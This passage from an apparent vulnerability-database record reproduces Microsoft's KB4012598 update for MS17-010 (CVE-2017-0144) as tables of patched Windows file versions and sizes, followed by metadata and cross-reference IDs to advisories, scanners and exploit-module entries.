applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H5\">For all supported x64-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong 
class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>233,984</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>239,104</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>289,792</td><td>03-Aug-2016</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>16:23</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>263,168</td><td>03-Aug-2016</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>229,376</td><td>03-Aug-2016</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,848</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,440</td><td>03-Aug-2016</td><td>17:10</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>144,384</td><td>03-Aug-2016</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>137,216</td><td>03-Aug-2016</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>229,376</td><td>03-Aug-2016</td><td>17:16</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,952</td><td>03-Aug-2016</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>248,320</td><td>03-Aug-2016</td><td>17:02</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,440</td><td>03-Aug-2016</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>261,120</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,152</td><td>03-Aug-2016</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>231,936</td><td>03-Aug-2016</td><td>17:10</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>99,840</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>101,376</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>233,984</td><td>11-Feb-2017</td><td>17:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>239,104</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>289,792</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>16:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>263,168</td><td>11-Feb-2017</td><td>17:25</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>229,376</td><td>11-Feb-2017</td><td>17:25</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,848</td><td>11-Feb-2017</td><td>17:37</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,440</td><td>11-Feb-2017</td><td>17:42</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:36</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>144,384</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>137,216</td><td>11-Feb-2017</td><td>17:41</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>229,376</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,952</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>248,320</td><td>11-Feb-2017</td><td>17:37</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,440</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>261,120</td><td>11-Feb-2017</td><td>17:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,152</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>231,936</td><td>11-Feb-2017</td><td>17:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>17:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>99,840</td><td>11-Feb-2017</td><td>17:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>101,376</td><td>11-Feb-2017</td><td>17:33</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>16:23</td><td>x64</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:41</td><td>x64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>14:40</td><td>x64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>147,968</td><td>11-Feb-2017</td><td>15:43</td><td>x64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>448,512</td><td>11-Feb-2017</td><td>15:48</td><td>x64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>448,000</td><td>11-Feb-2017</td><td>15:44</td><td>x64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>176,128</td><td>03-Aug-2016</td><td>14:40</td><td>x64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>178,176</td><td>11-Feb-2017</td><td>15:43</td><td>x64</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:22</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>299,008</td><td>03-Aug-2016</td><td>16:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>274,432</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>258,048</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:05</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>299,008</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>274,432</td><td>11-Feb-2017</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>258,048</td><td>11-Feb-2017</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:17</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:18</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H5\">For all supported x86-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:22</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>299,008</td><td>03-Aug-2016</td><td>16:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>274,432</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>258,048</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:40</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>299,008</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>274,432</td><td>11-Feb-2017</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:06</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>258,048</td><td>11-Feb-2017</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:17</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:18</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>103,936</td><td>03-Aug-2016</td><td>14:20</td><td>x86</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>103,936</td><td>11-Feb-2017</td><td>15:18</td><td>x86</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>304,640</td><td>11-Feb-2017</td><td>15:22</td><td>x86</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>305,152</td><td>11-Feb-2017</td><td>15:19</td><td>x86</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>146,432</td><td>03-Aug-2016</td><td>14:20</td><td>x86</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>147,968</td><td>11-Feb-2017</td><td>15:18</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink></body></html>", "published": "2017-03-14T00:25:04", "modified": "2017-03-14T17:40:16", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://support.microsoft.com/en-us/help/4012598/", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0144"], "immutableFields": [], "lastseen": "2019-10-05T22:48:35", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"modified": "2019-10-05T22:48:35", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": 
["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ANALYZE/JTR_WINDOWS_FAST", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"], "type": "threatpost"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": 
"saint"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["CVE-2017-0144"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-10-05T22:48:35", "value": 6.8, "vector": "NONE"}}, "objectVersion": "1.5", "kb": "KB4012598", "msrc": "MS17-010", "mscve": "CVE-2017-0144", "msplatform": "", "msfamily": "Windows", "msimpact": "", "msseverity": "", "superseeds": [], "parentseeds": [], "msproducts": ["13230", "14113", "13228", "11721", "14210", "11728", "11740", "11733", "11719", "13236", "13233", "14440", "13234", "11708"], "supportAreaPaths": ["371fbe0b-cb79-c748-a47a-4dc327bf6944", "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "333f3bd9-9578-fda0-5919-4b8fa39524c3", "f62ed778-6986-d76e-c007-40a28315ffbf", 